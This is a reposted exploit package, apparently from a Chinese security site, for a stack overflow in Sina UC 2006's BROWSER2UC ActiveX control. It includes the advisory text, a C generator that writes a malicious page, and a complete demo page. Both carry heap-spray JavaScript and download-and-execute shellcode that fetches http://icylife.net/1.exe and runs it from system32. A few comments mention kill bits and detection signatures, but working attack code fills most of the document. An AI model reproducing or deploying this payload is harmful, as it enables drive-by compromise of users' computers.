Sina UC 2006 ActiveX SendChatRoomOpt Exploit


鬼仔:我编译了下,下载地址:
2007011012544.rar

来源:Ph4nt0m

//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 新浪UC ActiveX多个远程栈溢出漏洞
//
// Sowhat of Nevis Labs
// 日期: 2007.01.09
//
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
//
// CVE: 暂无
//
// 厂商
//
// Sina Inc.
//
// 受影响的版本:
// Sina UC <=UC2006
//
// Overview:
// 新浪UC是中国非常流行的IM工具之一
//
// http://www.51uc.com
//
// 细节:
//
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机。
//
// 多个控件存在栈溢出问题,包括但不限于:
//
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll
//
// Sub SendChatRoomOpt (
// ByVal astrVerion As String ,
// ByVal astrUserID As String ,
// ByVal asDataType As Integer ,
// ByVal alTypeID As Long
// )
//
// 当第1个参数是一个超长字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

// Output stream for the generated HTML page; opened in main() and written to by
// both main() and PrintPayLoad().
FILE *fp = NULL;
// Fixed, relative name of the HTML file the generator creates.
char *file = "fuck_uc.html";
// Download URL taken from argv[1]; main() appends it to the payload bytes.
char *url = NULL;

// Payload bytes. main() copies them into a buffer, appends the URL string, and
// PrintPayLoad() emits the result as %uXXXX escapes inside the generated page.
// Per the authors' accompanying write-up, the payload downloads the file at that
// URL, saves it in system32 as ~.exe and runs it in the background.
// Indicators visible in the bytes themselves: the immediates 5c 7e 2e 65 and
// 78 65 spell "\~.exe", and the trailing 55 52 4c 4d 4f 4e spells "URLMON".
// Host-side, a browser process creating and then launching ~.exe is the
// behaviour to alert on.
unsigned char sc[] =
"/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70"
"/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8"
"/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00"
"/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00"
"/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45"
"/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40"
"/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75"
"/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00"
"/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5"
"/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a"
"/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c"
"/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c"
"/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45"
"/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59"
"/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08"
"/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00"
"/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03"
"/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7"
"/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c"
"/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41"
"/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d"
"/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24"
"/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5"
"/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e"
"/x00";

// First part of the generated page. It holds an HTML comment naming the targeted
// control (CLSID, DLL path, SendChatRoomOpt signature), followed by the opening
// of a <script> that sets the spray target address 0x0c0c0c0c and starts the
// `shellcode = unescape(` expression that PrintPayLoad() completes.
// Defensive note: the CLSID below is the identifier to set an ActiveX kill bit
// for on hosts where the control cannot be removed or updated.
char * header =
"<!--/n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n"
"C://Program Files//sina//UC//ActiveX//BROWSER2UC.dll/n/n"

"Sub SendChatRoomOpt (/n"
" ByVal astrVerion As String ,/n"
" ByVal astrUserID As String ,/n"
" ByVal asDataType As Integer ,/n"
" ByVal alTypeID As Long/n"
")/n/n"
"ph4nt0m.org, Code By 云舒 & LuoLuo/n"
"!-->/n/n"
"<html>/n"
"<head>/n"
"<script language=/"javascript/">/n"
"var heapSprayToAddress = 0x0c0c0c0c;/n"
"var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";

// Script text written after the payload. It sizes a slide of 0x9090 words so
// that slide plus payload fills a 0x100000-byte block (minus 0x38), then stores
// (heapSprayToAddress - 0x100000) / heapBlockSize copies of that block in an array.
// It also defines the getSpraySlide() helper, which doubles the slide string
// until it is long enough and then truncates it.
// Detection note: a script that builds megabyte-sized strings from repeated
// unescape("%u9090...") data and allocates them in a loop is the heap-spray
// pattern content scanners look for.
char * footer =
"/n"
"var heapBlockSize = 0x100000;/n"
"var payLoadSize = shellcode.length * 2;/n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
"var spraySlide = unescape(/"%u9090%u9090/");/n/n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n"
"memory = new Array();/n/n"
"for (i=0;i<heapBlocks;i++)/n{/n"
"/t/tmemory[i] = spraySlide + shellcode;/n}/n"

"function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
"while (spraySlide.length*2<spraySlideSize)/n/t"
"{/n/t/tspraySlide += spraySlide;/n/t}/n"
"/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n";

// Writes the payload buffer to the global stream `fp` as JavaScript string
// literals of %uXXXX escapes, one escape per 16-bit word of the buffer.
//
// lpBuff   - buffer to encode; it is read as an array of unsigned short.
// buffsize - number of bytes to encode. The loop steps by 2, so an odd size
//            reads one byte past buffsize (main() passes a zero-filled
//            4096-byte buffer).
//
// Returns nothing. `fp` must already be open for writing.
void PrintPayLoad(char *lpBuff, int buffsize)
{
  int i;
  for(i=0;i < buffsize;i+=2)
  {
    // Every 16 bytes (8 escapes) start a new quoted segment.
    if((i%16)==0)
    {
      if(i!=0)
      {
        // Close the previous segment and join the next one with '+'.
        fprintf(fp, "%s", "/" +/n/"");
      }
      else
      {
        // First segment: only the opening quote is needed.
        fprintf(fp, "%s", "/"");
      }
    }
    // One 16-bit word as a %u escape with four hex digits.
    fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
  }
  // The payload is printed right after `header`; close the last segment and the
  // unescape( call with ");".
  fprintf(fp, "%s", "/");/n");
}

// Command-line generator: takes a download URL and a target selector, then
// writes the page `file` made of header + encoded payload + footer + the call
// into the BROWSER2UC control.
//
// argv[1] - URL appended to the payload bytes.
// argv[2] - target selector: 1 = Windows XP SP2 + IE 6, 2 = Windows 2003 SP1 + IE 6.
//
// Returns -1 on a usage error, a rejected URL or a failed fopen().
// Defensive note: the generated script instantiates the ProgID
// "BROWSER2UC.BROWSERToUC" and passes a multi-kilobyte first argument to
// SendChatRoomOpt; both strings are usable as content-inspection signatures.
int main( int argc, char *argv[] )
{
  if( argc != 3 )
  {
    printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );
    printf( "Usage: %s <url> <os>/n", argv[0] );
    printf( " 1 Windows XP SP2 Chinese version,IE 6/n" );
    printf( " 2 Windows 2003 standard SP1 Chinese Version, IE 6/n" );
    
    return -1;
  }
  
  // Holds the final script fragment, formatted below.
  char  seh[1024] = { 0 };
  int    os = atoi( argv[2] );
  int    len = 0;
  
  // Length of the filler string per target; any other selector leaves len at 0.
  if( os == 1 )
  {
    len = 3133;
  }
  else if( os == 2 )
  {
    len = 3193;
  }
  
  // Script tail: creates the control, builds arg1 from `len` filler characters
  // plus four 0x0c bytes, calls SendChatRoomOpt and closes the page.
  sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"%%0c%%0c%%0c%%0c/");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );
  
  url = argv[1];
  // strstr() matches the scheme anywhere in the string, so this is a substring
  // test rather than the prefix test the error message describes.
  if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
  {
    printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
    return -1;
  }

  printf("[+] download url:%s/n", url);

  fp = fopen( file , "w" );
  if( fp == NULL )
  {
    printf( "Create file error: %d/n", GetLastError() );
    return -1;
  }
  fprintf( fp, "%s", header );
  fflush( fp );
  
  // Payload bytes followed by the URL; the zero-filled buffer supplies the
  // terminator counted by the +1 below.
  // NOTE(review): the URL length is not checked against the 4096-byte buffer.
  char  buffer[4096] = { 0 };
  int    sc_len = sizeof(sc)-1;
  memcpy(buffer, sc, sc_len);
  memcpy(buffer+sc_len, url, strlen(url));

  sc_len += strlen(url)+1;
  PrintPayLoad((char *)buffer, sc_len);
  fflush( fp );
  
  fprintf( fp, "%s", footer );
  fprintf( fp, "%s", seh );
  
  fflush( fp );
  fclose( fp );

  printf( "Create done!please look %s/n", file );
}

UC BROWSER2UC.dll溢出演示代码
今天和LuoLuo测试了下,写成了这个测试代码。网页会下载我blog的http://icylife.net/1.exe,这个是记事本,下载到system32保存为~.exe并后台运行。生成器晚上再写哈,朕饿了。

这个我们测试了
<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->
<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->

不过IE7还不能利用,晚上再加通过JS判断系统类型的部分,这样就不用修改i的值了,现在针对系统需要修改。


<!--
Demonstration page for the stack overflow in the first argument of
SendChatRoomOpt in the Sina UC BROWSER2UC ActiveX control.

1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll

Sub SendChatRoomOpt (
ByVal astrVerion As String ,
ByVal astrUserID As String ,
ByVal asDataType As Integer ,
ByVal alTypeID As Long
)

Code By 云舒 & LuoLuo

Defensive notes: the CLSID above is the identifier to set an ActiveX kill bit
for. The ProgID "BROWSER2UC.BROWSERToUC", the repeated %u9090 slide and the
multi-kilobyte first argument are the strings a content filter can match on.
-->

<html>
<head>
<script language="javascript">
// Address the sprayed heap blocks are meant to cover.
var heapSprayToAddress = 0x0c0c0c0c;
// Payload as %u-escaped 16-bit words. The last two lines decode to the ASCII
// string "http://icylife.net/1.exe", the download URL named in the write-up.
var shellcode = unescape("%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u6369%u6c79%u6669%u2e65" +
"%u656e%u2f74%u2e31%u7865%u0065");

// Each block is a slide plus the payload, sized to 0x100000 bytes minus 0x38.
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
// Number of blocks allocated below the target address.
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
// Doubles the slide until it reaches spraySlideSize bytes, then truncates it
// to exactly that size.
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// Instantiating the control by ProgID is the step an ActiveX kill bit blocks.
var obj = new ActiveXObject("BROWSER2UC.BROWSERToUC");
var arg1;

<!-- Windows2003 standard SP1 + IE6: the overwrite length i here is 3193 -->
<!-- Windows XP SP2 + IE6: the overwrite length i here is 3133 -->
for( var i = 0; i < 3133; i ++ )
{
arg1 += "A";
}

// The overlong first argument ends in four 0x0c bytes, matching the spray address.
arg1=arg1 + unescape("%0c%0c%0c%0c");
arg2="defaultV";
arg3=1;
arg4=1;
obj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);
</script>
</head>
</html>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。